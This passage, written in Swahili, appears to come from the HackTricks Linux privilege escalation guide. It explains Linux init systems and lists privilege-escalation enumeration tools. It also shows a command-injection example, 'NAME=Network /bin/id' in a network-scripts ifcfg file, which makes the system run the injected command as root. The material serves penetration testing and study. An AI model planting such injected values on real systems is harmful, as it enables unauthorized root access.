Katika kesi yangu, NAME= inayotolewa katika hizi scripts za mtandao haishughulikiwi vizuri. Ikiwa una nafasi nyeupe/boreshaji katika jina mfumo unajaribu kutekeleza sehemu baada ya nafasi nyeupe/boreshaji. Hii ina maana kwamba kila kitu baada ya nafasi ya kwanza ya boreshaji kinatekelezwa kama root.

Kwa mfano: /etc/sysconfig/network-scripts/ifcfg-1337

NAME=Network /bin/id
ONBOOT=yes
DEVICE=eth0

init, init.d, systemd, na rc.d

Direktori /etc/init.d ni nyumbani kwa scripts za System V init (SysVinit), mfumo wa usimamizi wa huduma za Linux wa jadi. Inajumuisha scripts za kuanzisha, kusitisha, kurestart, na wakati mwingine kureload huduma. Hizi zinaweza kutekelezwa moja kwa moja au kupitia viungo vya alama vinavyopatikana katika /etc/rc?.d/. Njia mbadala katika mifumo ya Redhat ni /etc/rc.d/init.d.

Kwa upande mwingine, /etc/init inahusishwa na Upstart, usimamizi wa huduma wa kisasa ulioanzishwa na Ubuntu, ukitumia faili za usanidi kwa kazi za usimamizi wa huduma. Licha ya mpito kwenda Upstart, scripts za SysVinit bado zinatumika pamoja na usanidi wa Upstart kutokana na safu ya ulinganifu katika Upstart.

systemd inajitokeza kama msimamizi wa kisasa wa kuanzisha na huduma, ikitoa vipengele vya juu kama vile kuanzisha daemon kwa mahitaji, usimamizi wa automount, na picha za hali ya mfumo. Inapanga faili katika /usr/lib/systemd/ kwa ajili ya pakiti za usambazaji na /etc/systemd/system/ kwa ajili ya marekebisho ya msimamizi, ikirahisisha mchakato wa usimamizi wa mfumo.

Njia Nyingine

NFS Privilege escalation

NFS no_root_squash/no_all_squash misconfiguration PE

Kutoroka kutoka Shells zilizozuiliwa

Escaping from Jails

Cisco - vmanage

Ulinzi wa Usalama wa Kernel

Msaada Zaidi

Static impacket binaries

Zana za Linux/Unix Privesc

Zana bora ya kutafuta vektori za kupandisha hadhi za ndani za Linux: LinPEAS

LinEnum: https://github.com/rebootuser/LinEnum(-t option) Enumy: https://github.com/luke-goddard/enumy Unix Privesc Check: http://pentestmonkey.net/tools/audit/unix-privesc-check Linux Priv Checker: www.securitysift.com/download/linuxprivchecker.py BeeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Linux Kernelpop: Kuorodhesha udhaifu wa kernel katika linux na MAC https://github.com/spencerdodd/kernelpop Mestaploit: multi/recon/local_exploit_suggester Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester EvilAbigail (ufikiaji wa kimwili): https://github.com/GDSSecurity/EvilAbigail Kukusanya scripts zaidi: https://github.com/1N3/PrivEsc

Marejeleo

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.